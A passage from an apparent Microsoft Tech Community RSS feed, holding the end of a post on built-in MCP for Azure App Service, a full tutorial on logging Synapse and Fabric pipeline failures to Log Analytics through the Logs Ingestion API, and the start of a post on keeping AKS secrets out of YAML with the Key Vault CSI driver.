&lt;H3&gt;Built-in or custom?&lt;/H3&gt;
&lt;P&gt;Built-in MCP is the fastest path when your tools map cleanly to REST operations. If you need behavior that doesn't — multi-step workflows, in-memory aggregation, MCP resources or prompts, or more than one MCP server on a single app — a custom MCP server built with an MCP SDK and deployed as your application code is still the right choice. The two approaches complement each other, and you can read more about choosing between them in the docs.&lt;/P&gt;
&lt;H3&gt;Security&lt;/H3&gt;
&lt;P&gt;Built-in MCP works with &lt;STRONG&gt;App Service Authentication&lt;/STRONG&gt;, so MCP requests go through the same identity checks as every other route on your app, using Microsoft Entra or any OpenID Connect provider you've configured. When App Service Authentication is enabled, the platform also publishes OAuth protected-resource metadata so MCP clients can complete the OAuth flow automatically. As always, your application code is responsible for validating the bearer token on each request — and you should avoid exposing an MCP server publicly without authentication, since every published tool becomes callable once a client connects.&lt;/P&gt;
&lt;H3&gt;Getting started&lt;/H3&gt;
&lt;P&gt;Built-in MCP is configured through the &lt;STRONG&gt;aiIntegration&lt;/STRONG&gt; property on your App Service app, and the preview supports three configuration paths: the Azure portal, the Azure CLI (&lt;STRONG&gt;az rest&lt;/STRONG&gt;), and Bicep. It runs on dedicated pricing tiers, Basic or higher — it isn't supported on Free, Shared, Consumption, or Flex Consumption plans.&lt;/P&gt;
&lt;P&gt;This is a preview, and we'd love your feedback as you try it. To enable built-in MCP on your own app and connect an MCP client, head to the docs:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/azure/app-service/configure-mcp-built-in" target="_blank"&gt;Configure App Service built-in MCP (preview)&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A class="lia-external-url" href="https://learn.microsoft.com/azure/app-service/scenario-ai-model-context-protocol-server" target="_blank"&gt;Use App Service as a Model Context Protocol (MCP) server&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;</description>
      <pubDate>Mon, 08 Jun 2026 13:09:52 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/apps-on-azure-blog/now-in-preview-built-in-mcp-for-azure-app-service/ba-p/4526407</guid>
      <dc:creator>jordanselig</dc:creator>
      <dc:date>2026-06-08T13:09:52Z</dc:date>
    </item>
    <item>
      <title>Designing Reliable Data Platforms: Centralized Failure Logging Framework with Azure Monitor</title>
      <link>https://techcommunity.microsoft.com/t5/analytics-on-azure-blog/designing-reliable-data-platforms-centralized-failure-logging/ba-p/4505832</link>
      <description>&lt;H1&gt;&lt;SPAN class="lia-text-color-21"&gt;&lt;STRONG&gt;Introduction&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/H1&gt;
&lt;P data-start="150" data-end="346"&gt;Modern data platforms are no longer just about moving and transforming data. In production, what really matters is reliability and how quickly you can understand and react when something breaks.&lt;/P&gt;
&lt;P data-start="348" data-end="544"&gt;If you’re using Azure Synapse/ADF/Microsoft Fabric, you already have built-in monitoring. You can see pipeline runs, error messages.&lt;/P&gt;
&lt;P data-start="348" data-end="544"&gt;But it doesnt show you activity level errors, Pipeline errors works well when you’re debugging a single failure.&lt;/P&gt;
&lt;P data-start="546" data-end="567"&gt;But it doesn’t scale.&lt;/P&gt;
&lt;P data-start="569" data-end="802"&gt;Once you have dozens of pipelines running across multiple environments, failures become harder to track. You find yourself jumping between pipeline runs, scanning activity outputs, and trying to piece together what actually happened.&lt;/P&gt;
&lt;P data-start="804" data-end="862"&gt;And suddenly, simple questions become difficult to answer:&lt;/P&gt;
&lt;UL data-start="864" data-end="1062"&gt;
&lt;LI data-section-id="qyza8c" data-start="864" data-end="906"&gt;Which datasets are failing most often?&lt;/LI&gt;
&lt;LI data-section-id="1u6zs9" data-start="907" data-end="964"&gt;Are failures concentrated in Bronze, Silver, or Gold?&lt;/LI&gt;
&lt;LI data-section-id="1606yxs" data-start="965" data-end="1016"&gt;Is this a one-off issue or a recurring pattern?&lt;/LI&gt;
&lt;LI data-section-id="p38ort" data-start="1017" data-end="1062"&gt;What changed between yesterday and today?&lt;/LI&gt;
&lt;/UL&gt;
&lt;P data-start="1064" data-end="1161"&gt;At that point, pipeline-level monitoring is no longer enough. You need something more structured.&lt;/P&gt;
&lt;P data-start="1064" data-end="1161"&gt;P.S the framework can be implemented across both&lt;STRONG&gt; Synapse and Microsoft Fabric&lt;/STRONG&gt; environments with minimal changes.&lt;/P&gt;
&lt;H1 data-section-id="cer2gy" data-start="1111" data-end="1153"&gt;&lt;SPAN class="lia-text-color-21"&gt;&lt;STRONG&gt;Why we need a custom logging framework&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/H1&gt;
&lt;P data-start="1212" data-end="1296"&gt;The core issue is that pipeline failures are treated as&lt;STRONG&gt; runtime events, not as data&lt;/STRONG&gt;.&lt;/P&gt;
&lt;P data-start="1298" data-end="1527"&gt;They live inside pipeline output and are tied to a specific run. This makes them hard to query across time, aggregate across pipelines, correlate across environments, or understand which activities failed inside the pipeline or integrate into alerting and dashboards in a consistent way.&lt;/P&gt;
&lt;P data-start="1529" data-end="1584"&gt;Pipeline Failures are visible but activity failures are not , and they’re not operationalized, what’s missing is a central place where all failures are captured in a consistent, structured format, regardless of which pipeline or dataset produced them including Activity level logs.&lt;/P&gt;
&lt;P data-start="1744" data-end="1793"&gt;That’s where a custom logging framework comes in, instead of relying only on built-in monitoring, we introduce a layer that captures failures as structured events, standardizes the payload across pipelines, and sends it to Log Analytics where it can be queried using KQL.&lt;/P&gt;
&lt;P data-start="2018" data-end="2169"&gt;This shifts the model from checking a pipeline when it fails to treating failures as a dataset that can be analyzed, monitored, and improved over time.&lt;/P&gt;
&lt;P data-start="2171" data-end="2428"&gt;Once you make that shift, you can build alerts based on patterns instead of reacting to single failures, track reliability across datasets or domains, and identify recurring issues instead of dealing with incidents one by one.&lt;/P&gt;
&lt;P data-start="2430" data-end="2613"&gt;It also changes who can use the data, visibility is no longer limited to engineers digging into pipeline runs it becomes accessible at the platform level for leads and stakeholders.&lt;/P&gt;
&lt;P data-start="2615" data-end="2730" data-is-last-node="" data-is-only-node=""&gt;This framework &lt;STRONG&gt;doesn’t replace Synapse &lt;/STRONG&gt;monitoring. It complements it by&lt;STRONG&gt; adding a proper observability layer on top.&lt;/STRONG&gt;&lt;/P&gt;
&lt;P data-start="2615" data-end="2730" data-is-last-node="" data-is-only-node=""&gt;&amp;nbsp;&lt;/P&gt;
&lt;H1 data-start="2615" data-end="2730"&gt;&lt;SPAN class="lia-text-color-21"&gt;&lt;STRONG&gt;Architecture&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/H1&gt;
&lt;img /&gt;
&lt;P data-start="525" data-end="771"&gt;When a pipeline fails in Synapse, the failure is intercepted through a dedicated failure path. At this stage, we don’t just log the error as-is we pass it through a custom logging framework that transforms the failure into a structured payload.&lt;/P&gt;
&lt;P data-start="773" data-end="1037"&gt;This payload includes key context such as pipeline name, activity, environment, dataset, layer (Bronze/Silver/Gold), error details, and correlation identifiers.&lt;/P&gt;
&lt;P data-start="773" data-end="1037"&gt;The important part here is&lt;STRONG&gt; consistency every pipeline emits the same schema, regardless of its logic&lt;/STRONG&gt;.&lt;/P&gt;
&lt;P data-start="1039" data-end="1261"&gt;Once the payload is constructed, it is sent to Azure Monitor using the Logs Ingestion API, this API acts as the entry point into the monitoring system and decouples the pipelines from the underlying storage implementation.&lt;/P&gt;
&lt;P data-start="1263" data-end="1479"&gt;A Data Collection Rule (&lt;STRONG&gt;DCR&lt;/STRONG&gt;) sits behind the ingestion layer and defines how incoming data is handled. It acts as a contract for the payload schema and optionally applies transformations before the data is persisted.&lt;/P&gt;
&lt;P data-start="1481" data-end="1757"&gt;Finally, the logs are stored in a custom Log Analytics table, where they become fully query-able using KQL, at this point, failures are no longer tied to a single pipeline run they are part of a centralized dataset that can be analyzed across time, environments, and domains.&lt;/P&gt;
&lt;P data-start="1481" data-end="1757"&gt;&amp;nbsp;&lt;/P&gt;
&lt;H1 data-start="1481" data-end="1757"&gt;&lt;STRONG&gt;Setting up Log Analytics&lt;/STRONG&gt;&lt;/H1&gt;
&lt;P data-start="167" data-end="421"&gt;Before integrating the logging framework with Synapse, we first need to set up the destination for our logs, this includes creating a Log Analytics workspace, defining a custom table, and configuring the ingestion path using a Data Collection Rule (DCR).&lt;/P&gt;
&lt;P data-start="423" data-end="550"&gt;The goal is to create a pipeline where structured failure events can be received, validated, and stored in a consistent format.&lt;/P&gt;
&lt;P data-start="423" data-end="550"&gt;P.S all steps mentioned in this blog can be automated with ARM templates.&lt;/P&gt;
&lt;H2 data-section-id="yczjjc" data-start="557" data-end="595"&gt;1. Create a Log Analytics workspace&lt;/H2&gt;
&lt;P data-start="597" data-end="724"&gt;Start by creating a Log Analytics workspace. This will act as the central store for all failure logs across your data platform.&lt;/P&gt;
&lt;P data-start="726" data-end="746"&gt;In the Azure Portal:&lt;/P&gt;
&lt;UL data-start="747" data-end="947"&gt;
&lt;LI data-section-id="141ofnb" data-start="747" data-end="805"&gt;Navigate to &lt;STRONG data-start="761" data-end="805"&gt;Azure Monitor → Log Analytics workspaces&lt;/STRONG&gt;&lt;/LI&gt;
&lt;LI data-section-id="a5azgj" data-start="806" data-end="871"&gt;Create a new workspace in your target subscription and region&lt;/LI&gt;
&lt;LI data-section-id="18hvm0o" data-start="872" data-end="947"&gt;Choose a meaningful name (for example: log-analytics-data-domain)&lt;/LI&gt;
&lt;/UL&gt;
&lt;P data-start="949" data-end="1047"&gt;This workspace becomes the single place where all pipeline failures will be collected and queried.&lt;/P&gt;
&lt;H2 data-section-id="1euc41n" data-start="1054" data-end="1103"&gt;2. Create a custom table for pipeline failures&lt;/H2&gt;
&lt;P data-start="1105" data-end="1211"&gt;Instead of relying on generic tables, we define a dedicated custom table to store pipeline failure events.&lt;/P&gt;
&lt;P data-start="1213" data-end="1246"&gt;From the Log Analytics workspace:&lt;/P&gt;
&lt;UL data-start="1247" data-end="1380"&gt;
&lt;LI data-section-id="1y008k7" data-start="1247" data-end="1303"&gt;Go to &lt;STRONG data-start="1255" data-end="1301"&gt;Tables → Create → Custom table (DCR-based)&lt;/STRONG&gt;&lt;/LI&gt;
&lt;LI data-section-id="1yzdl3v" data-start="1304" data-end="1380"&gt;Define a table name such as:&lt;BR data-start="1334" data-end="1337" /&gt;DataDomain_SynapsePipelineErrors_CL [it has to end with CL suffix]&lt;/LI&gt;
&lt;/UL&gt;
&lt;P data-start="1382" data-end="1483"&gt;At this stage, you’ll define the schema that represents your logging payload. Typical fields include:&lt;/P&gt;
&lt;UL data-start="1485" data-end="1722"&gt;
&lt;LI data-section-id="1ktjymq" data-start="1485" data-end="1502"&gt;TimeGenerated&lt;/LI&gt;
&lt;LI data-section-id="1i7p68d" data-start="1503" data-end="1519"&gt;PipelineName&lt;/LI&gt;
&lt;LI data-section-id="69qyum" data-start="1520" data-end="1537"&gt;PipelineRunId&lt;/LI&gt;
&lt;LI data-section-id="1p8fzoi" data-start="1538" data-end="1554"&gt;ActivityName&lt;/LI&gt;
&lt;LI data-section-id="1vhcezh" data-start="1555" data-end="1571"&gt;ActivityType&lt;/LI&gt;
&lt;LI data-section-id="13r11a4" data-start="1572" data-end="1582"&gt;Status&lt;/LI&gt;
&lt;LI data-section-id="1msukwt" data-start="1583" data-end="1596"&gt;ErrorCode&lt;/LI&gt;
&lt;LI data-section-id="vp7gsb" data-start="1597" data-end="1613"&gt;ErrorMessage&lt;/LI&gt;
&lt;LI data-section-id="5v6lvf" data-start="1614" data-end="1626"&gt;Severity&lt;/LI&gt;
&lt;LI data-section-id="67fknx" data-start="1627" data-end="1642"&gt;Environment&lt;/LI&gt;
&lt;LI data-section-id="xln5t7" data-start="1643" data-end="1652"&gt;Layer&lt;/LI&gt;
&lt;LI data-section-id="1vk9v6l" data-start="1653" data-end="1668"&gt;DatasetName&lt;/LI&gt;
&lt;LI data-section-id="uw7uou" data-start="1669" data-end="1686"&gt;PartitionDate&lt;/LI&gt;
&lt;LI data-section-id="1c3rxoq" data-start="1687" data-end="1704"&gt;WorkspaceName&lt;/LI&gt;
&lt;LI data-section-id="169xo71" data-start="1705" data-end="1722"&gt;CorrelationId&lt;/LI&gt;
&lt;/UL&gt;
&lt;P data-start="1724" data-end="1841"&gt;The key here is consistency, this schema will be reused across all pipelines, so take the time to define it properly.&lt;/P&gt;
&lt;H2 data-section-id="um9dlt" data-start="1848" data-end="1889"&gt;3. Create a Data Collection Rule (DCR)&lt;/H2&gt;
&lt;P data-start="1891" data-end="2040"&gt;The Data Collection Rule defines how incoming data is ingested into Log Analytics. It acts as both a &lt;STRONG data-start="1992" data-end="2011"&gt;schema contract&lt;/STRONG&gt; and a &lt;STRONG data-start="2018" data-end="2039"&gt;routing mechanism&lt;/STRONG&gt;.&lt;/P&gt;
&lt;P data-start="2042" data-end="2058"&gt;In Azure Portal:&lt;/P&gt;
&lt;UL data-start="2059" data-end="2180"&gt;
&lt;LI data-section-id="1vxlkzr" data-start="2059" data-end="2108"&gt;Go to &lt;STRONG data-start="2067" data-end="2108"&gt;Azure Monitor → Data Collection Rules&lt;/STRONG&gt;&lt;/LI&gt;
&lt;LI data-section-id="9a1wki" data-start="2109" data-end="2180"&gt;Create a new DCR and associate it with your Log Analytics workspace&lt;/LI&gt;
&lt;/UL&gt;
&lt;P data-start="2182" data-end="2197"&gt;Within the DCR:&lt;/P&gt;
&lt;UL data-start="2198" data-end="2427"&gt;
&lt;LI data-section-id="1g3t3v8" data-start="2198" data-end="2290"&gt;Define a &lt;STRONG data-start="2209" data-end="2226"&gt;custom stream&lt;/STRONG&gt; (for example: DataDomain_SynapsePipelineErrors_CL)&lt;/LI&gt;
&lt;LI data-section-id="1kdln6x" data-start="2291" data-end="2331"&gt;Map this stream to your custom table&lt;/LI&gt;
&lt;LI data-section-id="167f0nv" data-start="2332" data-end="2427"&gt;Optionally define transformations using KQL (for example, renaming fields or enforcing types)&lt;/LI&gt;
&lt;/UL&gt;
&lt;P data-start="2429" data-end="2595"&gt;This step is critical because it decouples your pipelines from the storage layer. If the schema evolves later, you can adjust it here without changing pipeline logic.&lt;/P&gt;
&lt;H2 data-section-id="ztgt00" data-start="2602" data-end="2645"&gt;4. Configure the Logs Ingestion endpoint&lt;/H2&gt;
&lt;P data-start="2647" data-end="2746"&gt;Once the DCR is created, Azure generates an ingestion endpoint that will be used by your pipelines.&lt;/P&gt;
&lt;P data-start="2748" data-end="2782"&gt;The endpoint follows this pattern:&lt;/P&gt;
&lt;LI-CODE lang=""&gt;https://&amp;lt;dce&amp;gt;.&amp;lt;region&amp;gt;.ingest.monitor.azure.com/dataCollectionRules/&amp;lt;dcrId&amp;gt;/streams/&amp;lt;streamName&amp;gt;?api-version=2023-01-01&lt;/LI-CODE&gt;
&lt;P data-start="2913" data-end="2988"&gt;This endpoint is what your Synapse pipeline will call using a Web Activity.&lt;/P&gt;
&lt;P data-start="2990" data-end="3021"&gt;At this point, you should also:&lt;/P&gt;
&lt;UL data-start="3022" data-end="3133"&gt;
&lt;LI data-section-id="1608d2y" data-start="3022" data-end="3066"&gt;Enable &lt;STRONG data-start="3031" data-end="3066"&gt;Managed Identity authentication&lt;/STRONG&gt;&lt;/LI&gt;
&lt;LI data-section-id="h3599u" data-start="3067" data-end="3133"&gt;Grant the Synapse workspace permission to send data to the DCR&lt;/LI&gt;
&lt;/UL&gt;
&lt;P data-start="3135" data-end="3187"&gt;This ensures secure ingestion without using secrets.&lt;/P&gt;
&lt;H2 data-section-id="il8nuu" data-start="3194" data-end="3218"&gt;5.RBAC for Managed Identity&lt;/H2&gt;
&lt;P&gt;The Managed Identity used by Synapse or Microsoft Fabric must have the following Azure RBAC role:&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Monitoring Metrics Publisher&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;This role allows the identity to send data through the Azure Monitor Logs Ingestion API.&lt;/P&gt;
&lt;P&gt;The role should be assigned on the:&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Data Collection Rule (DCR)&lt;/STRONG&gt; resource&lt;/P&gt;
&lt;P&gt;In Azure Portal:&lt;/P&gt;
&lt;P&gt;Data Collection Rule (DCR) → Access Control (IAM) → Add Role Assignment → Monitoring Metrics Publisher → Select Synapse/Fabric Managed Identity&lt;/P&gt;
&lt;P&gt;Without this role assignment, requests to the Logs Ingestion API will fail with authorization errors such as HTTP 403.&lt;/P&gt;
&lt;H2 data-section-id="il8nuu" data-start="3194" data-end="3218"&gt;6. Validate the setup&lt;/H2&gt;
&lt;P data-start="3220" data-end="3305"&gt;Before integrating with pipelines, it’s a good idea to validate that ingestion works.&lt;/P&gt;
&lt;P data-start="3307" data-end="3411"&gt;You can send a test payload (via Postman or a simple script) and then query your table in Log Analytics:&lt;/P&gt;
&lt;LI-CODE lang=""&gt;DataDomain_SynapsePipelineErrors_CL | take 10&lt;/LI-CODE&gt;
&lt;P data-start="3475" data-end="3554"&gt;If everything is configured correctly, you should see your test records appear.&lt;/P&gt;
&lt;P data-start="3475" data-end="3554"&gt;&amp;nbsp;&lt;/P&gt;
&lt;P data-start="3475" data-end="3554"&gt;&amp;nbsp;&lt;/P&gt;
&lt;H1 data-start="1481" data-end="1757"&gt;&lt;STRONG&gt;Integrating with Synapse pipelines&lt;/STRONG&gt;&lt;/H1&gt;
&lt;P&gt;Now that the ingestion layer is ready, the next step is connecting Synapse pipelines, so failures are logged automatically instead of sending manual test payloads.&lt;BR /&gt;The idea is simple:&lt;BR /&gt;whenever a pipeline activity fails, we capture the failure details, transform them into a structured payload, and send them directly to the Logs Ingestion API, this turns pipeline failures into centralized operational events.&lt;/P&gt;
&lt;H3&gt;1. Add a failure handling path&lt;/H3&gt;
&lt;P&gt;Inside your Synapse pipeline, add an &lt;STRONG&gt;On Failure&lt;/STRONG&gt; dependency from the activities you want to monitor.&lt;/P&gt;
&lt;P&gt;Typically, this includes &lt;STRONG&gt;critical &lt;/STRONG&gt;activities such as:&lt;/P&gt;
&lt;UL data-spread="false"&gt;
&lt;LI&gt;Copy Activities&lt;/LI&gt;
&lt;LI&gt;Notebook executions&lt;/LI&gt;
&lt;LI&gt;Stored Procedures&lt;/LI&gt;
&lt;LI&gt;Data Flows&lt;/LI&gt;
&lt;LI&gt;Web Activities&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Instead of allowing the pipeline to fail silently, the failure path redirects execution into a dedicated logging step , in most production environments, this is implemented as a reusable child pipeline such as:&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;pipeline name : Customized Logs API&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;This keeps logging logic centralized and avoids duplicating the same implementation across dozens of pipelines.&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;H3&gt;2. Pass failure metadata as parameters&lt;/H3&gt;
&lt;P&gt;The logging pipeline should receive operational context from the parent pipeline.&lt;/P&gt;
&lt;P&gt;Typical parameters include:&lt;/P&gt;
&lt;UL data-spread="false"&gt;
&lt;LI&gt;Pipeline name&lt;/LI&gt;
&lt;LI&gt;Pipeline run ID&lt;/LI&gt;
&lt;LI&gt;Activity name&lt;/LI&gt;
&lt;LI&gt;Activity type&lt;/LI&gt;
&lt;LI&gt;Error code&lt;/LI&gt;
&lt;LI&gt;Error message&lt;/LI&gt;
&lt;LI&gt;Environment&lt;/LI&gt;
&lt;LI&gt;Layer (Bronze/Silver/Gold)&lt;/LI&gt;
&lt;LI&gt;Dataset name&lt;/LI&gt;
&lt;LI&gt;Severity&lt;/LI&gt;
&lt;LI&gt;Correlation ID&lt;BR /&gt;&lt;BR /&gt;&lt;img /&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;This metadata becomes the foundation of the structured logging payload.&lt;/P&gt;
&lt;P&gt;The more operational context you capture here, the easier troubleshooting becomes later.&lt;/P&gt;
&lt;H3&gt;3. Construct the logging payload&lt;/H3&gt;
&lt;P&gt;Inside the logging pipeline [&lt;STRONG&gt;Customized Logs API]&lt;/STRONG&gt;, use a dynamic content expression to construct a JSON payload matching the Log Analytics schema.&lt;/P&gt;
&lt;P&gt;Example payload:&lt;/P&gt;
&lt;LI-CODE lang="json"&gt;&lt;a href="javascript:void(0)" data-lia-user-mentions="" data-lia-user-uid="3197173" data-lia-user-login="concat" class="lia-mention lia-mention-user"&gt;concat&lt;/a&gt;( '[{"TimeGenerated":"', utcNow(), '","PipelineName":"POC_Test"', ',"PipelineRunId":"', pipeline().RunId, '","PipelineStatus":"Failed"', ',"ActivityName":"TestActivity"', ',"ActivityType":"Web"', ',"ActivityStatus":"Failed"', ',"ErrorCode":"TEST"', ',"ErrorMessage":"POC test"', ',"Severity":"Warning"', ',"Environment":"Test"', ',"Layer":"Bronze"', ',"ExecutionStage":"POC"', ',"DatasetName":"TestDataset"', ',"PartitionDate":"', utcNow(), '","WorkspaceName":"', pipeline().DataFactory, '","TriggerName":"Manual"', ',"TriggerTimeUtc":"', utcNow(), '","DurationMs":1000', ',"RetryCount":0', ',"Compute":"Synapse"', ',"CorrelationId":"', pipeline().RunId, '","Payload":{"source":"test","target":"loganalytics"}}]' )&lt;/LI-CODE&gt;
&lt;P&gt;The important part is schema consistency.&lt;/P&gt;
&lt;P&gt;Every pipeline should emit the same payload structure regardless of which activity failed.&lt;/P&gt;
&lt;P&gt;This makes downstream querying and dashboarding significantly easier.&lt;/P&gt;
&lt;H3&gt;4. Send logs using a Web Activity&lt;/H3&gt;
&lt;P&gt;After constructing the payload, use a Web Activity to send the data to the Logs Ingestion API endpoint configured earlier.&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;Typical configuration:&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;URL:&lt;BR /&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;LI-CODE lang=""&gt;https://&amp;lt;data-collection-endpoint&amp;gt;.&amp;lt;region&amp;gt;.ingest.monitor.azure.com/dataCollectionRules/&amp;lt;dcr-id&amp;gt;/streams/&amp;lt;stream-name&amp;gt;?api-version=2023-01-01&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Method&lt;/STRONG&gt;&lt;BR /&gt;POST&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Authentication&lt;/STRONG&gt;&lt;BR /&gt;Managed Identity&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Resource&lt;/STRONG&gt;&lt;BR /&gt;https://monitor.azure.com&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Headers&lt;/STRONG&gt;&lt;/P&gt;
&lt;P data-start="3475" data-end="3554"&gt;{ "Content-Type": "application/json" }&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Body&lt;/STRONG&gt;&lt;BR /&gt;Dynamic JSON payload generated in the previous step.&lt;/P&gt;
&lt;P&gt;I highly recommend using Managed Identity avoids storing secrets or credentials inside Synapse pipelines and keeps authentication fully managed by Azure.&lt;/P&gt;
&lt;H3&gt;5. Validate end-to-end ingestion&lt;/H3&gt;
&lt;P&gt;Once the pipeline is connected, trigger a controlled failure and verify that the event appears in Log Analytics.&lt;/P&gt;
&lt;P&gt;Run:&lt;/P&gt;
&lt;P data-start="3475" data-end="3554"&gt;DataDomain_SynapsePipelineErrors_CL | sort by TimeGenerated desc | take 20&lt;/P&gt;
&lt;img /&gt;
&lt;P data-start="3475" data-end="3554"&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;You should now see real pipeline failures arriving automatically from Synapse.&lt;/P&gt;
&lt;P&gt;At this point, the framework becomes fully operational.&lt;/P&gt;
&lt;P&gt;Failures are no longer isolated runtime events buried inside activity outputs they are centralized, queryable operational records that can be analyzed across the entire platform.&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;H1 data-start="1481" data-end="1757"&gt;&lt;STRONG&gt;Future Steps&lt;/STRONG&gt;&lt;/H1&gt;
&lt;P&gt;Now that we have a centralized logging framework in place, we can take observability one step further by building operational dashboards in Power BI or Microsoft Fabric to analyze reliability trends across the entire data platform. Instead of reacting to isolated pipeline failures, we can aggregate logs across pipelines, datasets, environments, and medallion layers to identify what is actually causing instability over time. This allows engineering teams to detect recurring error patterns, identify unstable datasets, measure platform reliability, analyze failure spikes after deployments, and understand where operational bottlenecks are concentrated. By transforming pipeline failures into structured operational telemetry, the framework evolves beyond simple logging into a true observability platform that supports proactive reliability engineering, helping teams move from reactive firefighting to data-driven operational improvements based on measurable reliability KPIs such as failure trends, MTTR, SLA compliance, severity distribution, and pipeline health scoring.&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;H1 data-start="1481" data-end="1757"&gt;&lt;STRONG&gt;Links&lt;/STRONG&gt;&lt;/H1&gt;
&lt;OL&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/en-us/azure/azure-monitor/logs/tutorial-logs-ingestion-portal" target="_blank" rel="noopener"&gt;Tutorial: Send data to Azure Monitor Logs with Logs ingestion API (Azure portal) - Azure Monitor | Microsoft Learn&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://medium.com/@satyamgawade/medallion-architecture-understanding-with-azure-synapse-analytics-example-7c48cc2d3478" target="_blank" rel="noopener"&gt;Medallion Architecture Understanding with Azure Synapse Analytics Example | by Satyam Gawade | Medium&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;Feedback: &lt;A href="https://www.linkedin.com/in/sally-dabbah/" target="_blank" rel="noopener"&gt;Sally Dabbah | LinkedIn&lt;/A&gt;&amp;nbsp;&lt;/LI&gt;
&lt;/OL&gt;</description>
      <pubDate>Mon, 08 Jun 2026 10:31:33 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/analytics-on-azure-blog/designing-reliable-data-platforms-centralized-failure-logging/ba-p/4505832</guid>
      <dc:creator>Sally_Dabbah</dc:creator>
      <dc:date>2026-06-08T10:31:33Z</dc:date>
    </item>
    <item>
      <title>Getting Secrets Out of YAML: Implementing Azure Key Vault CSI Driver on AKS with Workload Identity</title>
      <link>https://techcommunity.microsoft.com/t5/microsoft-developer-community/getting-secrets-out-of-yaml-implementing-azure-key-vault-csi/ba-p/4522590</link>
      <description>&lt;H2&gt;Table of Contents&lt;/H2&gt;
&lt;UL&gt;
&lt;LI&gt;Why This Pattern Matters&lt;/LI&gt;
&lt;LI&gt;The Problem with Secrets in YAML&lt;/LI&gt;
&lt;LI&gt;What We Wanted to Achieve&lt;/LI&gt;
&lt;LI&gt;Architecture Overview&lt;/LI&gt;
&lt;LI&gt;How the Flow Works&lt;/LI&gt;
&lt;LI&gt;Implementation Prerequisites&lt;/LI&gt;
&lt;LI&gt;Step-by-Step Implementation&lt;/LI&gt;
&lt;LI&gt;Understanding the YAML Components&lt;/LI&gt;
&lt;LI&gt;Secret Rotation and Reloaders&lt;/LI&gt;
&lt;LI&gt;Common Pitfalls and Troubleshooting&lt;/LI&gt;
&lt;LI&gt;Security and Operational Benefits&lt;/LI&gt;
&lt;LI&gt;Key Takeaways&lt;/LI&gt;
&lt;LI&gt;Microsoft Documentation References&lt;/LI&gt;
&lt;LI&gt;Final Thoughts&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2&gt;Why This Pattern Matters&lt;/H2&gt;
&lt;P&gt;Most Kubernetes environments start with good intentions around secret management.&lt;/P&gt;
&lt;P&gt;Over time, however, many AKS deployments gradually evolve toward patterns like:&lt;/P&gt;
&lt;LI-CODE lang=""&gt;value: "#{SomeSecret}#"&lt;/LI-CODE&gt;
&lt;P&gt;A pipeline substitutes the value during deployment, the application works, and the pattern spreads across services.&lt;/P&gt;
&lt;P&gt;The problem is that this quietly turns:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;deployment pipelines&lt;/LI&gt;
&lt;LI&gt;rendered manifests&lt;/LI&gt;
&lt;LI&gt;release artifacts&lt;/LI&gt;
&lt;LI&gt;CI/CD logs&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;into part of the secret distribution path.&lt;/P&gt;
&lt;P&gt;Even if the secret originates from Azure Key Vault, the value itself still travels through multiple systems before reaching the pod.&lt;/P&gt;
&lt;P&gt;That creates:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;unnecessary exposure risk&lt;/LI&gt;
&lt;LI&gt;difficult rotation workflows&lt;/LI&gt;
&lt;LI&gt;broader operational blast radius&lt;/LI&gt;
&lt;LI&gt;audit complexity&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;This article walks through a cleaner runtime-based model using:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Azure Key Vault CSI Driver&lt;/LI&gt;
&lt;LI&gt;AKS Workload Identity&lt;/LI&gt;
&lt;LI&gt;Managed Identity federation&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;where workloads authenticate directly to Key Vault without secret values ever appearing in YAML or pipelines.&lt;/P&gt;
&lt;H2&gt;The Problem with Secrets in YAML&lt;/H2&gt;
&lt;P&gt;The traditional pattern usually looks like this:&lt;/P&gt;
&lt;LI-CODE lang="yaml"&gt;env: - name: APPLICATION_SECRET value: "#{ApplicationSecret}#"&lt;/LI-CODE&gt;
&lt;P&gt;At deployment time:&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;The pipeline retrieves the secret&lt;/LI&gt;
&lt;LI&gt;The placeholder is replaced&lt;/LI&gt;
&lt;LI&gt;Kubernetes receives the rendered manifest&lt;/LI&gt;
&lt;/OL&gt;
&lt;P&gt;Operationally, this means:&lt;/P&gt;
&lt;UL&gt;
